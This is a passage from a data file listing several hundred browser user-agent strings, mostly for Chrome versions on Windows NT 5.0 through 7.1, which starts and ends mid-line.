NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.113 Safari/534.30\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.815.10913 Safari/535.1\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.8\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.0 Safari/537.13\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.2 (KHTML, like Gecko) Chrome/22.0.1216.0 Safari/537.2\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.30\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.811.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.814.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/17.0.940.0 Safari/535.8\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.26 Safari/537.11\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4\nMozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36\nMozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36\nMozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nMozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36\nMozilla/5.0 (Windows NT 7.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30\nMozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) Chrome/4.0.223.3 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-CA) AppleWebKit/534.13 (KHTML like Gecko) Chrome/9.0.597.98 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13(KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13.\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/7.0.0 Safari/700.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.4 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/528.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Version/3.2.1 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.9 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.169.0 Safari/530.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.170.0 Safari/530.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.42 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.8 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.0 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.6\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.1 Safari/530.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.178.0 Safari/530.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/3.0.191.3 Safari/531.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.24 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML,like Gecko) Chrome/3.0.195.27\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.0 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.0 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.7 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.4 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.288.1 Safari/532.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.2 Safari/533.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.356.0 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.357.0 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10\nMozilla/5.0 (Windows U Windows NT 5.1 en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.583.0 Safari/534.12\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.724.100 Safari/534.30\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.53 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 